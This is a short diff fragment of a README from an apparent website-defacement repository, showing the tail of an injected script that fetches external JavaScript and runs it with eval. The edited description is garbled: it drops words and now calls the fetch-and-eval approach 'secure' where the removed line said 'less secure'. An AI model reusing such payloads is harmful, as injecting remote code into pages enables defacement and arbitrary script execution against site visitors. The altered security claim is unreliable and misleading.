Karthikdude/Deface/README.md

 for (let script of scripts) { eval(script.innerText); } }); </script>
 ```

-**Details:** This payload fetches an external JavaScript file and executes it directly using `eval`.
-While this is a less secure approach, it is effective in environments where execution of external scripts is needed.
+**Details:** This payload fetches an external JavaScript file While this is a  secure approach, it is effective in environments where execution of external scripts is needed.

 ---